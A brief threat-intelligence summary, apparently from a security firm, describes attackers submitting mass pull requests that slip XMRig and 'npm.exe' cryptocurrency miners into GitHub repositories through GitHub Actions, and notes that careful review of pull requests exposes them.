Recently, attackers have been utilizing the continuous integration/continuous delivery (CI/CD) features on GitHub (GitHub Actions) to merge unauthorized cryptocurrency miners into repositories. The attackers will fork a repository, include the miner, then create a massive number of pull requests for all of the originating repositories with the included miner code. The attackers are using the Monero miner XMRig and a miner known as npm.exe (no relation to Node.js). As of right now, 90+ known repositories are being targeted, but its effectiveness has yet to be seen as diligent repository maintainers will know something suspicious is occurring by carefully checking the details of code changes in pull requests before accepting them.
Written by: Nataliia Zdrok, Threat Intelligence Analyst at Binary Defense Russia’s invasion of Ukraine increased